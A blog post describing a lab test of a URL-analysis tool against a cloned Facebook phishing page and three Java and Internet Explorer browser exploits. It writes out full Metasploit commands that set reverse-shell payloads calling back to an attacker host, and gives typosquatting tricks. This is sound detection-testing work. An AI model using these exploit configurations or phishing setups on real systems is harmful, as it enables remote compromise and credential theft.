In continuation with the previous blog, wherein I have given a sneak preview about Statistical URL Analyzer. In this series of blog-posts, we shall briefly look into the MetaSploit and SET, two of the most widely used kits, which are used for generating, deployment and exploiting the systems.
In this article, we shall briefly look into the MetaSploit and SET, two of the most widely used kits, which are used for generating payloads laced with exploits, their deployment and eventually for exploiting the systems. Our use of MetaSploit is limited to testing the SURL Analyzer and simulate real-world scenarios.
Speaking about MetaSpolit, reminds me of a very recent hack attack on two of Nepalese Government Website, which were compromised and a drive-by download was being served. The full report can be viewed here. In their research they found out that the malware JAR was created using MetaSploit.
Snippet of the report, to highlight usage of MetaSploit
“… It’s interesting to note that all those compromises had injected code that was taken from the Metasploit framework, served in clear form, and not obfuscated. Although the use of code from the Metasploit framework doesn’t necessarily indicate a link between all the compromises …”
For testing the Statistical URL Analyzer, we setup Virtual Machines with BackTrack 5 and created a few payloads which consisted of Phishing pages, exploits laced pages, all being served via a website which has been cloned.
In the below example, we have cloned facebook.com for two purposes:
1: Create a malicious page which will infect the victims machine
2: Capture passwords, in real-world this would be nothing less than a Phishing web-site
While simulating a real-world scenario, it is imperative to know that:
1: A Genuine website is hacked using various methods and malicious code is inserted
2: Fake domain, similar to the domain, whose users are being targeted; is registered, a web-server is deployed and the trap is set. Eg. www.faceb0ok.com
3: Sometimes, we come across URLs with seemingly long domains www.facebook.com.fake.domain.com. These type of domains are mostly targeted towards Smart-Phone users. Smart-Phone users when viewing the link will view only the first few characters of the entire domain, effectively giving them a false sense of belief that they are visiting hxxp://www.facebook.com. In this scenario, additional sub-domains are created to spoof the actual domain.
In order to ensure the effectiveness and to test the rigidity of the algorithm, we modified the hosts file and added the fake domain entries into it. This virtually ensures that from the test machine, facebook.com will point to the lab server. Entries in the hosts file take precedence over the domain resolution via a DNS server. This was done to simulate the real-world scenario.
Eg 1. entry in hosts file '127.0.0.1 www.facebrok.com' Eg. 2.entry in hosts file '127.0.0.1 www.faceb0ok.com'
MetaSploit Configuration for various vulnerabilities
Exploit : 1 CVE : 2012-4681 OSVDB : 84867 Reference : Link
MetaSploit Commands
msf exploit(java_jre17_exec)> use exploit/multi/browser/java_jre17_exec msf exploit(java_jre17_exec)> set PAYLOAD java/shell/reverse_tcp PAYLOAD => java/shell/reverse_tcp msf exploit(java_jre17_exec)> set LHOST 192.168.5.200 LHOST => 192.168.5.200 msf exploit(java_jre17_exec)> set SRVPORT 80 SRVPORT => 80 msf exploit(java_jre17_exec)> set URIPATH / URIPATH => / msf exploit(java_jre17_exec)> exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.5.200:4444 [*] Using URL: https://0.0.0.0:80/ [*] Local IP: https://192.168.5.200:80/ [*] Server started.
Exploit : 2 CVE : 2012-1723 OSVDB : 82877 BID : 52161 Reference : Link
MetaSploit Commands
Msf exploit(java_verifier_field_access)> use exploit/multi/browser/java_verifier_field_access msf exploit(java_verifier_field_access)> set TARGET 1 TARGET => 1 Msf exploit(java_verifier_field_access)> set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(java_verifier_field_access) > set LHOST 192.168.5.200 LHOST => 192.168.5.200 msf exploit(java_verifier_field_access) > set SRVPORT 80 msf exploit(java_verifier_field_access)> set URIPATH /1 SRVPORT => 80 URIPATH => /1 msf exploit(java_verifier_field_access)> exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.5.200:4444 [*] Using URL: https://0.0.0.0:80/1 [*] Local IP: https://192.168.5.200:80/1 [*] Server started.
Exploit : 3 CVE : 2012-4969 OSVDB : 85532 MSB : MS12-063 Reference : Link
MetaSploit Commands
Msf exploit(ie_execcommand_uaf)> use exploit/windows/browser/ie_execcommand_uaf msf exploit(ie_execcommand_uaf)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ie_execcommand_uaf) > set LHOST 192.168.5.200 LHOST => 192.168.5.200 msf exploit(ie_execcommand_uaf) > set SRVPORT 80 SRVPORT => 80 msf exploit(ie_execcommand_uaf) > set URIPATH /2 URIPATH => /2 msf exploit(ie_execcommand_uaf) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.5.200:4444 [*] Using URL: https://0.0.0.0:80/2 [*] Local IP: https://192.168.5.200:80/2 [*] Server started.
The goal of this exercise was to see whether SURL Analyzer is able to detect these pages as malicious or not. The logical reasoning is that if there is detection then it can be mitigated. Detection based solely on algorithm and not a database full of malicious urls.
Result 1:
Checking : https://www.facebrok.com action = 0 0-scripts-0 ApInv=1 #Mal Results=1 Analysis Time=0.00176063379471494 seconds Total Time=0.0274778485256021 seconds #ToolKit #Result =1 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_195848.txt
MetaSploit Console Output:
[*] 192.168.5.200 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
Result 2:
Checking : https://www.facebrok.com/1 Server Header REDIRECTING to : /1/ action = 0 0-scripts-0 JAsz=1 #Mal JAc=1 #Mal Results=2 Analysis Time=0.196207084964831 seconds Total Time=1.67632544065315 seconds #ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200158.txt
MetaSploit Console Output:
[*] 192.168.5.200 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 192.168.5.200 java_verifier_field_access - Generated executable to drop (73802 bytes).
Result 3:
Checking : https://www.facebrok.com/2 Server Header REDIRECTING to : /2/TgolD.html Downloading Frame : www.facebrok.com/2/EpjstT.html Sc1=1 #Mal FR?Nor=1 DHx=1 Results=2 Analysis Time=0.0272505794048455 seconds Total Time=0.112398237387382 seconds #ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200417.txt
MetaSploit Console Output:
[*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) [*] 192.168.5.200 ie_execcommand_uaf - Redirecting to TgolD.html [*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) [*] 192.168.5.200 ie_execcommand_uaf - Loading TgolD.html [*] 192.168.5.200 ie_execcommand_uaf - Using msvcrt ROP [*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) [*] 192.168.5.200 ie_execcommand_uaf - Loading EpjstT.html
The next blog-post will contain my explanation pertaining the internal workings of SURL analyzer. Till then – Stay Safe.
